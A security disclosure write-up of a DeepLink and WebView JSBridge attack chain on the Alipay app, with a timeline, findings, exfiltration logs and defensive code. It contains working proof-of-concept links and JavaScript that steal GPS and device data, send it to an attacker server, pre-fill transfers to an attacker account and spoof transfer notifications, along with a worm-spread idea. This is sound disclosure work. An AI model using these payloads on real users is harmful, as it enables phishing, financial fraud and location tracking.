End-to-end analysis of the DeepLink + WebView JSBridge attack chain on the latest Alipay Android/iOS versions. Reported to Ant Group through responsible disclosure. Vendor response: "normal functionality."
Readers: please keep a backup. Fork the GitHub repo or save this page locally to prevent content loss if any node is taken down.
| Field | Value |
|---|---|
| Target | com.eg.android.AlipayGphone v10.8.26.7000 / v10.8.30.8000 |
| APK Size | 210.5 MB (220,503,494 bytes) |
| Platform | Android 16 (API 36) + iOS 26.3.1 |
| Analysis Date | 2026-02-16 ~ 2026-03-07 |
| Prerequisites | No root, no jailbreak, no special permissions. The victim only needs to click one link. |
| Researcher | Innora AI Security Research (feng@innora.ai) |
We followed responsible disclosure principles throughout. Before any public discussion, full reports were submitted to Ant Group through multiple channels.
- Started static analysis of the Alipay v10.8.30.8000 APK
- First report: TLS/SSL security analysis sent to bin.z@antgroup.com, lingyan.wanglingya@antgroup.com, antsrc@service.alipay.com
- Comprehensive analysis completed, covering SecurityGuard, BabaSSL, DexAOP and other modules in depth
- Second report: full DeepLink + JSBridge attack chain report (8 issues) sent to the Ant Group contact
- Third report: V3 enhanced version, 17 issues + 308 server log entries + 42 screenshots
- Fourth report: end-to-end external attack report with cross-platform verification on Samsung S25 Ultra + iPhone 16 Pro
- Test account banned (risk control triggered during testing); account unblock request sent
- Vendor response: "normal functionality", not considered a vulnerability
- Public disclosure: since the vendor confirmed these are "normal features", publicly discussing the security implications of "normal features" is entirely appropriate
Alipay's alipays:// DeepLink scheme allows any third-party app or webpage to direct users into Alipay's Nebula WebView container, which loads attacker-controlled external web pages. Once loaded, the attacker's JavaScript can call AlipayJSBridge APIs to perform a series of dangerous operations:
Attack prerequisites are minimal: the victim only needs to click one link. No root, no jailbreak and no app installation are required. The link can be distributed via SMS, WeChat, QQ, email, QR codes or any other channel.
Deploy the PoC page (e.g., https://innora.ai/zfb/poc/verify.html) and a data collection endpoint on any public HTTPS server.
Send the link via SMS, WeChat or QQ. The victim clicks it in a mobile browser and sees a social engineering page such as "Congratulations! You won a ¥88 red packet".
```text
intent://platformapi/startapp?appId=20000067&url=https%3A%2F%2Finnora.ai%2Fzfb%2Fpoc%2Fverify.html#Intent;scheme=alipays;package=com.eg.android.AlipayGphone;end
```
Chrome hands off to Alipay via the intent:// scheme. Alipay's Nebula WebView container loads the attacker page, and AlipayJSBridge is injected automatically. A "Continue to visit" warning appears, but it does NOT tell the user that the external page will gain access to JSBridge APIs.
The attacker's JavaScript then calls AlipayJSBridge APIs:
```javascript
// GPS location theft
AlipayJSBridge.call("getLocation", {}, function(result) {
  // result = {lat: 5.460012, lng: 100.314139, city: "槟城"}
  exfiltrate("GPS", result); // POST to attacker server
});
// Open the transfer page with the attacker's account pre-filled
AlipayJSBridge.call("startApp", {
  appId: "09999988",
  param: {
    actionType: "toAccount",
    account: "attacker@evil.com",
    amount: "1000"
  }
});
// Display a fake transfer notification
AlipayJSBridge.call("toast", {
  content: "Transfer ¥5,000 to Zhang*Ming completed",
  type: "success",
  duration: 5000
});
```
The stolen GPS, device and session data is sent to the attacker server over two channels, XHR POST and an Image beacon. 308 complete log entries were recorded.
When triggered from a browser or any third-party app, the following DeepLinks cause Alipay to navigate directly to sensitive function pages without any additional warning:
| appId | Target Page | Exposed Data |
|---|---|---|
| 20000003 | Transaction History | Full spending history (items, amounts, categories) |
| 20000116 | Transfer Contacts | 20+ contacts' real names, avatars, transfer amounts |
| 20000123 | Payment QR Code | Full payment QR + real name |
| 20000032 | Yu'E Bao (Money Market) | Balance ¥5.00 + total earnings ¥9,453.67 |
| 20000180 | Total Assets | Complete asset overview |
| 20000153 | Zhima Credit Score | Credit score |
| 20000193 | Bank Card Management | Linked bank card info |
| 09999988 | Transfer | Can pre-fill attacker account and amount |
| 20000033 | Withdrawal | Withdrawal page |
| 20000221 | Family Account | Family account list |
| 68687023 | Huabei (Credit) | Credit page |
| 10000007 | Scan | Triggers camera permission |
```java
// From any app or browser:
Intent i = new Intent(Intent.ACTION_VIEW);
i.setData(Uri.parse("alipays://platformapi/startapp?appId=20000003"));
startActivity(i);
// Alipay opens transaction history directly. No warning.
```
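The link format above can be checked mechanically. The following is an added example (not code from the report or from Alipay) that parses an alipays://platformapi/startapp DeepLink or its Chrome intent:// wrapper and flags the two risky properties described here: a sensitive appId from the table, and an external url= page being loaded into the WebView. It is meant for a link-scanning gateway or an audit script; the first-party domain suffixes are assumptions.

```javascript
// Added example (not part of the original report): parse an Alipay-style
// DeepLink, either alipays://platformapi/startapp?appId=...&url=... or the
// Chrome intent:// wrapper, and flag the combinations the report describes
// (sensitive appId, external url= loaded into the WebView). The appId list
// comes from the table above; the trusted domain suffixes are assumptions.

const SENSITIVE_APP_IDS = {
  "20000067": "H5 container (loads the external url= page)",
  "20000003": "transaction history",
  "20000116": "transfer contacts",
  "20000123": "payment QR code",
  "20000032": "Yu'E Bao",
  "20000180": "total assets",
  "20000153": "Zhima credit score",
  "20000193": "bank card management",
  "09999988": "transfer (pre-fillable account/amount)",
  "20000033": "withdrawal",
  "20000221": "family account",
  "68687023": "Huabei",
  "10000007": "scan (camera)",
};

// Assumed first-party suffixes; replace with the real allowlist.
const TRUSTED_SUFFIXES = ["alipay.com", "alipayobjects.com", "antgroup.com"];

function isTrustedHost(hostname) {
  const h = hostname.toLowerCase();
  return TRUSTED_SUFFIXES.some((s) => h === s || h.endsWith("." + s));
}

// Rewrite intent://<body>#Intent;scheme=X;...;end into X://<body>.
function normalizeDeepLink(link) {
  if (!link.startsWith("intent://")) return link;
  const hashAt = link.indexOf("#Intent;");
  if (hashAt < 0) return null;
  const body = link.slice("intent://".length, hashAt);
  const extras = link.slice(hashAt + "#Intent;".length).split(";");
  const scheme = extras.find((e) => e.startsWith("scheme="));
  return scheme ? `${scheme.slice("scheme=".length)}://${body}` : null;
}

function analyzeDeepLink(link) {
  const normalized = normalizeDeepLink(link);
  if (!normalized || !normalized.startsWith("alipays://")) {
    return { alipay: false, appId: null, target: null, findings: [] };
  }
  // URL() parses https reliably, so swap the custom scheme before parsing.
  const u = new URL(normalized.replace(/^alipays:\/\//, "https://"));
  const appId = u.searchParams.get("appId");
  const target = u.searchParams.get("url");
  const findings = [];
  if (appId && SENSITIVE_APP_IDS[appId]) {
    findings.push(`sensitive appId ${appId}: ${SENSITIVE_APP_IDS[appId]}`);
  }
  if (target) {
    let host = null;
    try { host = new URL(target).hostname; } catch (e) { /* relative url */ }
    if (host && !isTrustedHost(host)) {
      findings.push(`external page ${host} would load inside Alipay's WebView`);
    }
  }
  return { alipay: true, appId, target, findings };
}
```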
Below are live PoC pages you can test (sanitized, no data collection):
Simulates the phishing page an attacker would send via SMS/WeChat. Open it in Chrome on an Android phone with Alipay installed.
When loaded inside the Alipay WebView, demonstrates all data accessible via AlipayJSBridge APIs. All data is displayed locally only and is not sent to any server.
```text
alipays://platformapi/startapp?appId=20000067&url=https://innora.ai/zfb/poc/verify.html
```
Proves that pages chain-loaded via pushWindow also receive full JSBridge access.
All issues below were verified end-to-end on real devices, with server logs and screenshots as evidence. Each finding includes its verification status and evidence type.
The startApp API allows external pages to open Alipay's transfer page with a pre-filled recipient account and amount. The victim sees a transfer form already populated with the attacker's account. The final transfer still requires user confirmation, but combined with UI spoofing (V-08) and social engineering, the risk of user error is extremely high.
```json
{"tag":"f_startApp:转账预填(09999988)",
 "data":{"status":"ok","result":{"success":true}}}
```
API call: `AlipayJSBridge.call("startApp", {appId:"09999988", param:{actionType:"toAccount", account:"attacker@evil.com", amount:"1000"}})`
The pushWindow API allows external pages to execute transfer DeepLinks via the alipays:// scheme, passing the attacker's account and amount.
```json
{"tag":"f_pushWindow:transfer_scheme",
 "data":{"status":"ok","result":{"success":"true"}}}
```
External pages can open Alipay's payment cashier URL via pushWindow.
```json
{"tag":"f_pushWindow:cashier(支付收银台)",
 "data":{"status":"ok","result":{"success":"true"}}}
```
The tradePay API can be called from external pages, launching the Alipay payment UI. We tested 3 parameter formats and all triggered successfully (resultCode=6001 means the user cancelled manually, but the payment UI did appear).
```json
{"tag":"f_tradePay:full_orderStr",
 "data":{"status":"ok","result":{"resultCode":"6001"}}}
```
JavaScript in external pages successfully exfiltrated GPS coordinates, device info, network info and session IDs to the attacker server over the dual-channel XHR POST + Image beacon. Total: 308 complete log entries.
Via the startApp API, external pages can navigate to 18 sensitive internal pages, including transaction history, bank card management, credit score, withdrawal and family accounts. All returned success: true.
When the getLocation API is called from an external page and the user has previously granted location permission to Alipay, no secondary consent dialog is shown and precise GPS coordinates are returned directly. Verified on 3 devices (New Zealand Android, Malaysia Android, Hangzhou China iOS). Note: the iOS 14+ approximate location setting may affect precision.
```jsonc
// Samsung S25 Ultra, Auckland, New Zealand
{"lat": -36.707669, "lng": 174.719378, "city": "奥克兰", "country": "新西兰", "accuracy": 25}
// Redmi 23129RN51X, Penang, Malaysia
{"lat": 5.460012, "lng": 100.314139, "city": "槟城", "country": "马来西亚", "accuracy": 35}
// iPhone 16 Pro, Hangzhou, China
{"lat": 30.306882, "lng": 120.121303, "city": "杭州市"}
```
An attacker can display arbitrary toast messages inside Alipay (e.g., "Transfer ¥5,000 to Zhang*Ming completed") and change the title bar to phishing titles such as "Security Center" or "Red Packet Claim". Combined with social engineering, victims cannot distinguish real from fake.
The getAuthCode API can be triggered by external pages, initiating an OAuth server-side call. No auth code was obtained, but a "Service busy, please try later" popup appeared, proving the request reached the OAuth server.
A DeepLink directly opens the Yu'E Bao page, showing a balance of ¥5.00 and total earnings of ¥9,453.67. The transfer contacts page exposes the full real names of 20+ contacts. No additional confirmation is required.
| ID | Issue | Severity | Verified |
|---|---|---|---|
| V-01 | startApp pre-fills attacker account on transfer page | CRIT | 308 logs |
| V-02 | pushWindow executes transfer DeepLink | CRIT | 308 logs |
| V-03 | pushWindow opens payment cashier | CRIT | 308 logs |
| V-04 | tradePay triggers payment SDK | CRIT | 308 logs |
| V-05 | Full data exfiltration chain | CRIT | 308 logs |
| V-06 | 18 sensitive pages navigable | HIGH | 42 screenshots |
| V-07 | GPS location theft | HIGH | 3 devices |
| V-08 | UI spoofing (toast + title bar) | HIGH | 308 logs |
| V-09 | OAuth flow hijacking | HIGH | screenshot |
| V-10 | Yu'E Bao balance + contact names exposed | HIGH | screenshot |
| V-11 | Payment QR + real name exposure | HIGH | screenshot |
| V-12 | pushWindow redirects to login page (phishing entry) | HIGH | screenshot |
| V-13 | Chained WebView attack | HIGH | 308 logs |
| V-14 | Session info leakage | MED | 308 logs |
| V-15 | Full device fingerprint exfiltration | MED | 308 logs |
| V-16 | Network info leakage | MED | 308 logs |
| V-17 | API permission map leakage | MED | 308 logs |
Below is actual data received by the attacker server. These logs were recorded at the data collection endpoint on innora.ai, proving that data was indeed exfiltrated from the Alipay WebView to an external server.
```json
{
  "timestamp": "2026-03-07 11:53:51.599",
  "method": "POST",
  "path": "/exfil",
  "body": {
    "tag": "getLocation:GPS location",
    "data": {
      "status": "ok",
      "data": {
        "accuracy": 35,
        "city": "槟城",
        "country": "马来西亚",
        "latitude": 5.460012,
        "longitude": 100.314139
      }
    }
  }
}
```
```json
{
  "tag": "getSystemInfo:Device info",
  "data": {
    "apiLevel": 36,
    "app": "alipay",
    "bluetoothEnabled": true,
    "brand": "Redmi",
    "cameraAuthorized": false,
    "currentBattery": "100%",
    "locationAuthorized": true,
    "model": "Xiaomi 23129RN51X",
    "platform": "Android",
    "screenHeight": 1650,
    "screenWidth": 720,
    "storage": "119 GB",
    "system": "16",
    "version": "10.8.26.7000",
    "wifiEnabled": true
  }
}
```
```json
{
  "tag": "getStartupParams",
  "data": {
    "sessionId": "session_20000067_22751",
    "startFromExternal": "true",
    "sourcePackageName": "com.android.chrome",
    "safePayEnabled": "true",
    "appId": "20000067",
    "url": "http://192.168.80.12:8888/chain1.html"
  }
}
```
```json
{"tag": "f_startApp:转账预填(09999988)", "data": {"status": "ok", "result": {"success": true}}}
{"tag": "f_pushWindow:transfer_scheme", "data": {"status": "ok", "result": {"success": "true"}}}
{"tag": "f_pushWindow:cashier(支付收银台)", "data": {"status": "ok", "result": {"success": "true"}}}
{"tag": "f_tradePay:full_orderStr", "data": {"status": "ok", "result": {"resultCode": "6001"}}}
```
```text
Mozilla/5.0 (Linux; Android 16; 23129RN51X Build/BP2A.250605.031.A3; wv)
AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0
Chrome/126.0.6478.122
NebulaSDK/1.8.100112 Nebula
AliApp(AP/10.8.26.7000) AlipayClient/10.8.26.7000
Language/zh-Hant Region/CN
```
The User-Agent contains NebulaSDK, AliApp(AP/10.8.26.7000) and AlipayClient, the unique identifiers of the Alipay Nebula WebView container that cannot be forged. This proves these requests genuinely originated from within the Alipay app.
| File Type | Count | Description |
|---|---|---|
| Device Screenshots | 42 | 25 with CRITICAL labels + 17 general verification |
| Server Logs | 308 entries | exfil_server_log_20260307_complete.jsonl (136 KB) |
| PoC HTML | 8 | chain1~chain8 attack chains + trigger page |
| Attack Server | 1 | Python server.py (data collection + logging) |
| Nginx | 1 | nginx_exfil_access.log (52 KB) |
All attack chains were independently verified on the following 3 real devices, covering both Android and iOS:
API permissions on iPhone are more permissive than on Android, creating a larger attack surface:
| API | Android | iOS | Risk |
|---|---|---|---|
| tradePay | N/A | Available | Triggers payment SDK |
| share | N/A | Available | Worm propagation vector: auto-shares malicious links to WeChat/QQ |
| scan | N/A | Available | Opens camera |
| chooseImage | N/A | Available | Accesses photo library |
| getLocation | checkJSAPI N/A | Available | Location theft |
Worm risk: the share API on iOS means the attacker page can automatically share the malicious link to WeChat, QQ, SMS, DingTalk and other platforms, achieving self-propagation. One victim clicks → the malicious link is auto-shared to their contacts → exponential spread.
To be objective, Alipay's security architecture does have some working defensive measures. The following APIs are correctly blocked for external domains (returning permission denied):
- clipboard read/write
- getUserInfo
- rpc (backend RPC calls)
- httpRequest (bridge-level)
- openInBrowser
- sendSMS (actual sending is blocked)
- makePhoneCall
This demonstrates that Alipay has the capability to enforce domain whitelisting and permission controls at the JSBridge level. The APIs involved in the 17 issues above simply have not been added to the same permission control mechanism yet.
Ant Group's response (2026-03-10): the reported behaviour is "normal functionality of Alipay" and is not considered a security vulnerability.
We fully respect the vendor's judgment. However, the following facts do not change with the classification decision:
- startApp returned success: true, the transfer page opened, and the attacker's account was pre-filled. This fact is independent of whether it is classified as a vulnerability.
- clipboard and getUserInfo are correctly blocked, so why don't getLocation and startApp receive the same protection? Inconsistent treatment of different APIs within the same security framework at minimum indicates room for improvement.
- We publish this technical analysis not to argue about whether something is a "vulnerability." We are simply describing a fact publicly: through a single link, an attacker can obtain the GPS location from Alipay, open transfer pages and display fake notifications, without the user understanding the consequences. Readers can judge for themselves whether this is a security concern worth attention.
Important clarification: none of the attack chains described in this article can achieve "zero-interaction automatic transfers/debits." Fund transfers still require the user to actively tap the confirmation button. The core risk we discuss is that, under the combined attack of UI spoofing + social engineering + pre-filled information, the probability of a user making an erroneous operation is significantly increased. We strictly distinguish between "page navigation succeeded" and "fund operation completed," and make no exaggerations.
Although the vendor classifies these as "normal features," we still offer the following technical recommendations for consideration:
| # | Recommendation | Addresses |
|---|---|---|
| 1 | JSBridge domain whitelist: block startApp, pushWindow, tradePay and getLocation for non-Alibaba domains | V-01~V-07 |
| 2 | startApp parameter filtering: block param passing (pre-filled account/amount) when called from external pages | V-01, V-02 |
| 3 | pushWindow URL restriction: block pushWindow from loading alipays:// schemes and internal URLs | V-02, V-03, V-12 |
| 4 | tradePay source validation: tradePay must verify that the calling source is a trusted H5 app | V-04 |
| 5 | getLocation permission dialog: must show a user consent dialog when called from external pages | V-07 |
| 6 | DeepLink sensitive page protection: sensitive function DeepLinks should verify the calling source or require secondary confirmation | V-06, V-10, V-11 |
| 7 | UI spoofing protection: block toast and setTitle from external pages | V-08 |
| 8 | Enhanced "Continue to visit" warning: explicitly inform users of the API permissions the external page will gain | All |
| 9 | Data exfiltration prevention: check the target domain of XHR/Image requests within the WebView | V-05, V-15~V-17 |
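Recommendations 1, 2, 3 and 7 are all checks a bridge host can run before dispatching a JSAPI call. The following is an added example, not Alipay's code, of such a policy layer: it takes the origin of the page that issued the call, the API name and its parameters, evaluates every rule (so the violation list can also feed logging) and returns an allow/deny decision. The first-party domain suffixes are assumptions.

```javascript
// Added example, not Alipay's code: a reference policy check for a WebView
// JS bridge that turns recommendations 1, 2, 3 and 7 into rules. The bridge
// host calls evaluateJsapiCall() with the origin of the page that issued the
// call before dispatching it. Every rule is evaluated, so the violation list
// can also feed logging. Domain suffixes are assumptions.

const TRUSTED_SUFFIXES = ["alipay.com", "alipayobjects.com", "antgroup.com"];

// Rules 1 and 7: APIs that an external page must not call at all.
const FIRST_PARTY_ONLY = new Set([
  "startApp", "pushWindow", "tradePay", "getLocation", "toast", "setTitle",
]);

function hostOf(url) {
  try { return new URL(url).hostname.toLowerCase(); } catch (e) { return null; }
}

function isFirstPartyHost(host) {
  return host !== null &&
    TRUSTED_SUFFIXES.some((s) => host === s || host.endsWith("." + s));
}

// Only https pages on a trusted domain count as first party; http, file or
// about pages are treated as external even if the host name matches.
function isFirstPartyOrigin(origin) {
  return origin.startsWith("https://") && isFirstPartyHost(hostOf(origin));
}

// Returns { allow, external, violations }; violations lists the rules hit.
function evaluateJsapiCall(origin, api, params) {
  const p = params || {};
  const external = !isFirstPartyOrigin(origin);
  const violations = [];

  if (external && FIRST_PARTY_ONLY.has(api)) {
    violations.push(`R1: ${api} is not available to external pages`);
  }
  // Rule 2: external callers must not pre-fill startApp parameters.
  if (external && api === "startApp" && p.param !== undefined) {
    violations.push("R2: external startApp call carries param (pre-fill)");
  }
  // Rule 3: pushWindow opens https pages only, never an alipays:// DeepLink,
  // and an external page may not push an internal (first-party) URL.
  if (api === "pushWindow" && typeof p.url === "string") {
    if (!p.url.startsWith("https://")) {
      violations.push("R3: pushWindow url is not https");
    } else if (external && isFirstPartyHost(hostOf(p.url))) {
      violations.push("R3: external page pushes an internal URL");
    }
  }
  return { allow: violations.length === 0, external, violations };
}
```

With this in place, the V-01 call from the PoC page is denied on two rules (R1 and R2), while the same call from a first-party https page passes unchanged.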
If Ant Group wishes to discuss further, request clarification or ask for specific content updates after reading this article, please email feng@innora.ai. If the issues discussed here are addressed in a future version, we will promptly update this article and mark the fix status.
Other security researchers with questions about the technical analysis, or who wish to exchange findings, are also welcome to reach out.
Please fork or download a backup. If any mirror becomes unavailable, retrieve the full content from another node.